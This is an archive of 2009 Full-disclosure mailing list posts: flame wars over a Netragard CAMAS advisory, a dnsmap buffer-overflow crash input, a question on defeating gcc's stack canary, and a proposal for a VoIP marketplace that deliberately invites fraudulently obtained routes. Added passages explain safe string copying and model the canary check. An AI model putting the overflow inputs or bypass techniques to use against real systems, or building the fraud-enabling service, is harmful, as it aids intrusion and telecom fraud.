 Regards,
 
 Nick FitzGerald
 
 

Re: [Full-disclosure] Cambium Group, LLC. CAMAS Advisory

2009-02-26 Thread Jason Starks
I guess these days it isn't so amazing that people can type, and even hit
send, rarely sharing their views face to face. Hiding in your grandmother's
closet with your indestructible, glow-in-the-dark keyboard from Best Buy is
sooo in. Anyways, free Kev.. speech!

On Thu, Feb 26, 2009 at 5:22 PM, Smoking Gun pentesterk...@gmail.com wrote:

 On Wed, Feb 25, 2009 at 11:57 AM, Adriel T. Desautels
 ad_li...@netragard.com wrote:
  I'm not sure if its appropriate for this list but it is related to
  penetration testing and vulnerability disclosure (moderators decide).
 

 The irony of Kevin (don't make fun of my complexion) Finisterre disclosing
 he has a full time job outside of security followed by his foray into the
 realm
 of security with advisories is puzzling. So Kevin isn't working in the
 industry as he disclosed in his previous email which means he obviously
 isn't working for Netragard which leads me to believe that Netragard is
 merely a fictitious company formed on an IRC channel amongst friends.
 Now this is not to say there is anything wrong with this however, to trust
 a bunch of IRC kids on an infrastructure would amount to career suicide.
 For starters outside of a modded Pentium, they'd have little experience in
 the real world. Themes like DoDAF, DIACAP, Information Security
 Architecture would be beyond the scope of their understanding.

 Without further ado, I'll now speculate on the intent of this current
 Critical advisory Netragard was gracious enough to bless the community
 with.

  -
 -
  Contact : Adriel T. Desautels
  Researcher  : Kevin Finisterre
  Vendor Notified : 08/22/2007
 

  [Proof Of Concept]
  -
 -
  Proof of concept code exists but is not provided as to not increase
  CAMAS
  users overall risk levels. Any website that reads Powered by the
  Cambium
  Group, LLC. is a CAMAS powered website.

 Snake oil at its finest. You may recall Netragard has a pay for play
 scheme working where they never disclose any code. This works
 to anyone's advantage as a trump card when you think about it on
 a psychological warfare like scale. We found a tumor somewhere
 in your body however, we're choosing not to tell you about how we
 found it, nor where it is.

 Imagine if you will those words coming out of a doctor's mouth.
 You have to take into account that a doctor is a professional as
 should someone in this industry be - a professional. The entire
 absurdity of finding a tumor and not revealing that tumor is
 quite shady. Wouldn't you agree? You may choose to disagree
 but offer some supportive argument should you choose to say
 so.

  [Vendor Status and Chronology]
  -
 -
  08/06/2007 07:11:57 PM EDT - Vulnerabilities Discovered
  08/24/2007 09:38:41 AM EDT - Cambium Group, LLC. Notified in full detail
  08/24/2007 10:54:01 AM EDT - Cambium Group, LLC. Responds to
  Notification
  08/27/2007 10:31:30 AM EDT - Conference Call Scheduled
  08/29/2007 03:00:00 PM EDT - Held Conference call - Presented Solution
  08/29/2007 03:00:00 PM EDT - Communication with the Cambium Group Faded
  09/26/2008 11:17:35 PM EDT - Issues remain unfixed
  02/09/2009 09:00:00 PM EDT - Issues remain unfixed
  02/11/2009 03:44:19 PM EST - Whistle Blower FD Posting (No affiliation
  to Netragard)
  02/11/2009 04:55:20 PM EST - Netragard Prepares Advisory for Release

 During the initial discovery by the self-imposed experts at Netragard, it
 seems that Cambium performed some form of diligence in the sense
 they took the time to listen to Netragard however, much can be gleaned
 from Netragard's own choice of wording:

  08/29/2007 03:00:00 PM EDT - Held Conference call - Presented Solution
  08/29/2007 03:00:00 PM EDT - Communication with the Cambium Group Faded

 At the onset of a conference call - dot dot dot - there was an immediate
 breakdown. Not one day later, not one week later - according to Netragard
 it occurred the minute Netragard got on call with them. This is a rather
 peculiar scenario if you think about it logically. What could have been
 the potential breakdown; after all, Cambium took the time out of their
 schedules to do something. Could it have been the pitch offered by
 Netragard? Were you guys trying to extort them, Adriel? How could that
 conference have played out?

 http://www.copyright.gov/1201/2003/comments/019.pdf

 It has been brought to my attention that, on July 18, 2002, a buffer
 overflow
 exploit of Tru64 UNIX was posted on securityfocus.com under the alias
 pha...@webtribe.net (a/k/a phased, pha...@mail.ru and James Green).
 Based on information provided by Gil Novak to HP concerning aliases
 utilized
 by SnoSoft, we understand that this action 

Re: [Full-disclosure] Apple Safari 4 Beta feeds: URI NULL Pointer Dereference Denial of, Service Vulnerability

2009-02-26 Thread Jason Starks
Better yet, name two.

On Thu, Feb 26, 2009 at 9:22 PM, Jubei Trippataka
vpn.1.fana...@gmail.com wrote:



 On Fri, Feb 27, 2009 at 12:26 PM, ne...@feelingsinister.net wrote:

 BM_X-Force_WP_final.pdf is called Application-Specific Attacks:
 Leveraging the ActionScript Virtual Machine and if you haven't read it,
 you should. It'll make you smile.



 OK, and what about this vulnerability makes use of a NULL pointer? This
 goes to show the shallow exploitation knowledge of this community. If you
 actually understood the paper it's (NULL + offset). This is NOT the same as
 a plain NULL deref bug. Also, you need to be able to map the NULL address,
 so I ask again, in examples such as this, in user-space apps name one
 exploitable condition.


 --
 ciao

 JT


Re: [Full-disclosure] Buffer Overflow in dnsmap 0.22 - DNS Network Mapper by pagvac (gnucitizen.org)

2009-02-25 Thread Jason Starks
I'm going to say dnsmap isn't suid or sgid, and a segmentation fault can
occur after triggering a simple programming error (you've shown no signs of
code execution). Terrific.

On Wed, Feb 25, 2009 at 10:36 AM, srl security.research.l...@gmail.com wrote:

 Security Advisory:

 PRODUCT
 
 http://www.gnucitizen.org/blog/new-version-of-dnsmap-out/
 http://www.gnucitizen.org/static/blog/2009/02/dnsmap-022.tar

 This is a great tool, used by the two pentesters, pagvac and pdp.

 TECHNICAL DESCRIPTION
 
 A local buffer overflow exists in dnsmap 0.22.
 $ dnsmap -r `perl -e 'print "A"x250'`
 dnsmap 0.22 - DNS Network Mapper by pagvac (gnucitizen.org)

 Segmentation fault

 SOLUTION
 *
 Wait until pagvac learns about strncpy().

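The advisory above says nothing about dnsmap's internals beyond "a 250-byte argument crashes it" and "learn about strncpy()". The block below is an added illustration, not dnsmap's code: the unbounded-copy pattern that produces exactly that symptom, next to two hardened forms, including the strncpy pitfall that the one-line "solution" glosses over (strncpy does not terminate the destination when the source is too long). The 64-byte buffer size, the function names and the constructed 250-byte input are assumptions.

```c
#include <stddef.h>
#include <string.h>

enum { NAME_BUF = 64 };   /* assumption: a small fixed stack buffer, as a tool might use for a domain name */

/* Length of s, scanning at most max bytes, so an overlong input is cheap to detect.
 * (Same contract as POSIX strnlen, written out here to stay portable.) */
static size_t bounded_len(const char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* The vulnerable pattern the advisory describes: an unbounded copy of an
 * attacker-controlled argument into a fixed-size buffer. Shown for contrast only;
 * nothing in this file calls it. */
void copy_arg_unsafe(char *dst, const char *src)
{
    strcpy(dst, src);   /* "A" x 250 into 64 bytes overruns the caller's frame */
}

/* Hardened form 1: measure first and reject oversized input outright instead
 * of truncating it silently. Returns 0 on success, -1 if src does not fit. */
int copy_arg_checked(char *dst, size_t dstsize, const char *src)
{
    if (dstsize == 0)
        return -1;
    size_t n = bounded_len(src, dstsize);
    if (n >= dstsize)               /* no room left for the terminating NUL */
        return -1;
    memcpy(dst, src, n + 1);        /* copies the terminator too */
    return 0;
}

/* Hardened form 2: the strncpy route. strncpy alone is not a fix: when src is
 * dstsize bytes or longer it leaves dst unterminated. This wrapper always
 * terminates and reports truncation (returns 1) instead of hiding it. */
int copy_arg_truncating(char *dst, size_t dstsize, const char *src)
{
    if (dstsize == 0)
        return -1;
    strncpy(dst, src, dstsize - 1);
    dst[dstsize - 1] = '\0';
    return bounded_len(src, dstsize) >= dstsize ? 1 : 0;
}

/* Rebuilds the advisory's test input, perl -e 'print "A"x250', and feeds it to
 * the checked copy. Returns that copy's status: -1 means the argument was rejected. */
int demo_reject_overlong(void)
{
    char arg[251];
    char name[NAME_BUF];
    memset(arg, 'A', 250);
    arg[250] = '\0';
    return copy_arg_checked(name, sizeof name, arg);
}
```

Rejecting is usually the better choice for a name or hostname argument: a silently truncated domain is a different query than the one the user asked for, and the caller never learns it.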
Re: [Full-disclosure] New version of webshag is available !

2009-02-25 Thread Jason Starks
Yeah, 'stick it to the dev'! I hope he has learned his lesson and that he
will use more correct numbering systems instead of whatever he wants to,
just because he wrote the code..

On Wed, Feb 25, 2009 at 3:24 AM, srl security.research.l...@gmail.com wrote:

 You should change chapter numbering from your user manual
 http://www.scrt.ch/outils/webshag/ws110_manual.pdf. 0x is used for
 hexadecimal not for binary, so using 0x0010 for decimal 2 is incorrect.

 On Fri, Feb 20, 2009 at 4:56 PM, SaD webs...@scrt.ch wrote:

 Webshag 1.10 has been released! This new version provides several
 feature enhancements as well as some bug-fixes.

 For those who don't know it, webshag is a free, multi-threaded,
 multi-platform web server audit tool. Written in Python, it gathers
 commonly useful functionalities for web server auditing like website
 crawling, URL scanning and file fuzzing.

 As for the previous version, webshag 1.10 is freely available (GPL
 license) for Linux and Windows platforms from
 http://www.scrt.ch/pages_en/outils.html


Re: [Full-disclosure] Buffer Overflow in dnsmap 0.22 - DNS Network Mapper by pagvac (gnucitizen.org)

2009-02-25 Thread Jason Starks
Sweet. If that is true, you should get to work on an actual exploit right
away. We wouldn't want the immortal ./ segmentation fault to affect
your stature on this list.

On Wed, Feb 25, 2009 at 11:24 AM, srl security.research.l...@gmail.com wrote:

 Dear Jason Starks,

 It can be exploited remotely via XSS in the attack vectors API's and
 framework made by PDP, btw great work PDP and gnucitizen.org security
 team, keep up the good work. I am now trying to attach gdb to javascript to do
 remote exploitation of dnsmap.



 On Wed, Feb 25, 2009 at 6:10 PM, Jason Starks jstarks...@gmail.com wrote:

 I'm going to say dnsmap isn't suid or sgid, and a segmentation fault can
 occur after triggering a simple programming error (you've shown no signs of
 code execution). Terrific.

 On Wed, Feb 25, 2009 at 10:36 AM, srl 
 security.research.l...@gmail.com wrote:

  Security Advisory:

 PRODUCT
 
 http://www.gnucitizen.org/blog/new-version-of-dnsmap-out/
 http://www.gnucitizen.org/static/blog/2009/02/dnsmap-022.tar

 This is a great tool, used by the two pentesters, pagvac and pdp.

 TECHNICAL DESCRIPTION
 
 A local buffer overflow exists in dnsmap 0.22.
 $ dnsmap -r `perl -e 'print "A"x250'`
 dnsmap 0.22 - DNS Network Mapper by pagvac (gnucitizen.org)

 Segmentation fault

 SOLUTION
 *
 Wait until pagvac learns about strncpy().

Re: [Full-disclosure] [NETRAGARD SECURITY ADVISORY] [Cambium Group, LLC. CAMAS Content Management System -- Multiple Critical Vulnerabilities][NETRAGARD-20070820]

2009-02-24 Thread Jason Starks
Everybody love everybody?

On Tue, Feb 24, 2009 at 4:49 PM, bobby.mug...@hushmail.com wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 Dear SNOSOFT,

 Thanks to you for proving every insult made to your company as
 truths. Demonstrating monstrous volume of elementary computer
 hacking features in some unnamed and unknown web based interface
 does separate you from the Valdis's of the community, but not by
 much.

 You sirs should return to crying about children hijacking your xbox
 live accounts after defeating you in video games, and leave the
 more advanced computer security web hacking to Stefan Esser and his
 technical James Bond xbox hacking team.

 Also please learn to better format your pasted advisories to this
 list.

 thanks and all the best to you,
 - -bm

 On Tue, 24 Feb 2009 16:00:00 -0500 Netragard Advisories
 advisor...@netragard.com wrote:
 * Netragard,  L.L.C
 Advisory***
 
The Specialist in Anti-Hacking.
 
 [Posting Notice]
 ---
 --
 If you intend to post this advisory on your web page please create
 a
 clickable link back to the original Netragard advisory as the
 contents
 of the advisory may be updated. The advisory can be found on the
 Netragard website at http://www.netragard.com/
 
 For more information about Netragard visit
 http://www.netragard.com
 
 [Advisory Information]
 ---
 --
 Contact: Adriel T. Desautels
 Researcher : Kevin Finisterre
 Advisory ID: NETRAGARD-20070820
 Product Name   : CAMAS (Content Management System)
 Product Version: Unknown
 Vendor Name: Cambium Group, LLC.
 Type of Vulnerability  : Multiple Critical Vulnerabilities
 Impact : Critical
 Vendor Notified: 08/22/2007
 
 [Product Description]
 ---
 --
 Cambium Group's content management system (CAMAS) gives you
 independence from outdated content and expensive web masters.
 Let
 the user-friendly interface of CAMAS save you time and money with
 the
 freedom to manage your entire web channel yourself.
 
 Taken From:
 http://www.cambiumgroup.com/interior.php/pid/3/sid/3
 
 [Technical Summary]
 ---
 --
 The Cambium Group Content Management System (CAMAS) failed most
 Open Web Application Security Project (OWASP) criteria during
 testing.
 Specific areas of vulnerability that were identified are as
 follows:
 
 Note: A reference to each is provided at the following URL:
 
 -- https://www.owasp.org/index.php/Category:Vulnerability --
 
 [+] Authentication Testing (FAIL)
 ---
 --
 CAMAS does not transport all authentication credentials over a
 secure
 encrypted channel. It is possible to capture users' credentials in
 
 transit.
 
 [+] Code Quality Testing (FAIL)
 ---
 --
 CAMAS does not follow industry best practices as defined by OWASP.
 Specifically, CAMAS is missing critical security functionality
 that
 leaves
 CAMAS powered websites open to attack by internet based hackers.
 
 [+] Error Handling Testing (FAIL)
 ---
 --
 CAMAS is missing proper error handling and event logging
 capabilities
 as defined by OWASP. This lack of proper error handling and
 logging
 results in information leakage that can be used by an attacker to
 
 further
 compromise a CAMAS powered website.
 
 [+] Input Validation Testing (FAIL)
 ---
 --
 CAMAS does not perform proper Input Validation. In some areas
 CAMAS
 does not perform any input validation.  As a result it is possible
 to
 execute
 arbitrary database commands against databases that support CAMAS
 powered websites. It is also possible to take control of CAMAS
 powered
 websites, databases and web-servers. CAMAS does not use
 Parameterized Stored Procedures which is the industry standard for
 defending against SQL Injection.
 
 [+] Logging and Auditing Testing (FAIL)
 ---
 --
 CAMAS is missing Logging and Auditing functionality as defined by
 OWASP.
 
 [+] Password Management (FAIL)
 ---
 --
 CAMAS does not perform proper password 

Re: [Full-disclosure] Worthless Disclosure

2009-02-19 Thread Jason Starks
Of course. You get what you pay for and is there really any real point of
relevance in asking?

Jason

On Thu, Feb 19, 2009 at 11:03 PM, T Biehn tbi...@gmail.com wrote:

 While I can never hope to live up to Jim Bell's seminal work 'assassination
 politics' the following is a rough draft of something that follows the same
 vein.
 A theme, which many of you undoubtedly will recognize from the current TPB
 court proceedings, of making money indirectly by taking advantage of safe
 harbor laws by creating services that are very tempting to criminal
 activity.
 Of course the most notable example would be YouTube, which nobody will deny
 made its popularity off of user-contributed copyrighted works, which
 provided the catalyst userbase that allows it to persist in such popularity
 today.
 Other video sharing sites that have cropped up more or less cater exactly
 to the posters of copyright content, such as the supernova offerings.

 This trend of 'turning around' DMCA's Safe Harbor on the legislators that
 drafted and passed it is a practice I lamely call 'Chaos Engineering' or
 engineering a service in such a way as to instigate criminal activity,
 protect and propagate that activity, whilst profiting from it as a service
 entirely legally.

 One could imagine, and those familiar with the VoIP criminal underground
 would agree, a VoIP marketplace that allowed anyone to provide a terminating
 route with a bid. Such a service would intelligently route to the
 lowest-priced available termination point. To make this service tempt the
 underworld you allow 'anonymous' (e-gold anonymous) signups, and payout in
 any of the currently popular e-monies systems, pecunix, liberty reserve,
 WebMoney, include bank wires, cheques etc.
 To further (and would perhaps be overkill here) promote to the underground
 you offer an affiliate program then launch your own programs (under false
 credentials of course) to promote the site directly to the various
 'Phreaking' communities.
 Naturally the termination points that were attained via some amount of
 coercive or illicit business practice would be the lowest priced so that
 their routes would be selected.
 The service makes its profit by charging the average rate weighted by
 individual server availability... a price higher than the lowest priced
 services but still lower than the major VoIP providers.

 Yeah so how would you all respond to such a situation? Jump on the money
 train or what.

 Great,

 -Travis


[Full-disclosure] Exploiting buffer overflows via protected GCC

2009-02-13 Thread Jason Starks
I came across a problem that I am sure many security researchers have seen
before:

ja...@uboo:~$ cat bof.c
#include <stdio.h>
#include <string.h>

int main()
{
    /* 512-byte stack buffer; gcc's SSP places a canary just above it */
    char buf[512];

    /* Writes 16 bytes past the end of buf: clobbers the canary (and the
       saved return address above it), which is what triggers the abort */
    memset(buf, 'A', 528);

    return 0;
}
ja...@uboo:~$

ja...@uboo:~$ ./bof
*** stack smashing detected ***: ./bof terminated
=== Backtrace: =
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x48)[0xb7f08548]
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x0)[0xb7f08500]
./bof[0x8048467]
[0x41414141]
Aborted
ja...@uboo:~$

I have googled my brains out for a solution, but all I have gathered is that
my Ubuntu's gcc is compiled with SSP and every time I try to overwrite the
return address it also overwrites the canary's value, and triggers a stop in
the program. I've disassembled it and anybody who can help me probably
doesn't need me to explain much more, but I would like to know a way to get
this. There seem to be some people on this list who may know something on
how to exploit on *nix systems with this protection enabled.

I do not want to just disable the protection and exploit it normally, I want
to learn how to exploit it this way.

Jason
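As an added illustration (not from Jason's post), a small C model of what gcc's -fstack-protector does to main()'s frame in bof.c: the guard word sits between buf and the saved return address, so the 528-byte memset clobbers it and the epilogue check aborts before the corrupted return address is ever used. DEMO_CANARY and the frame_t layout are constructed for the model; the real canary is a random per-process value.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define BUF_SIZE 512

/* Constructed canary for this model. Real SSP draws a fresh random value per
 * process (glibc keeps it in TLS, %gs:0x14 on i386) and, like here, gives it a
 * NUL low byte so string functions stop before copying it. */
#define DEMO_CANARY UINT64_C(0xdeadbeef1a2b3c00)

/* One protected frame: buf sits below the guard word, so any write that runs
 * off the end of buf hits the guard before it can reach the saved %ebp and
 * return address above it. */
typedef struct {
    unsigned char storage[BUF_SIZE + sizeof(uint64_t)];
} frame_t;

/* Returns 1 if writing 'len' bytes of 'A' into the buffer changes the guard
 * (what __stack_chk_fail would abort on), 0 if the guard survives. */
int overflow_trips_canary(size_t len)
{
    frame_t f;
    uint64_t canary = DEMO_CANARY;
    uint64_t after;

    /* Prologue: drop the canary just past the buffer. */
    memcpy(f.storage + BUF_SIZE, &canary, sizeof canary);

    /* The bug from bof.c. The model stops at the end of its own storage so
     * the demo stays defined; the real program keeps writing over the frame. */
    if (len > sizeof f.storage)
        len = sizeof f.storage;
    memset(f.storage, 'A', len);

    /* Epilogue: compare the stored guard against the original value. */
    memcpy(&after, f.storage + BUF_SIZE, sizeof after);
    return after != canary;
}

int main(void)
{
    size_t lens[] = { 512, 513, 528 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++)
        printf("memset of %zu bytes: %s\n", lens[i],
               overflow_trips_canary(lens[i]) ? "canary clobbered, abort"
                                             : "canary intact");
    return 0;
}
```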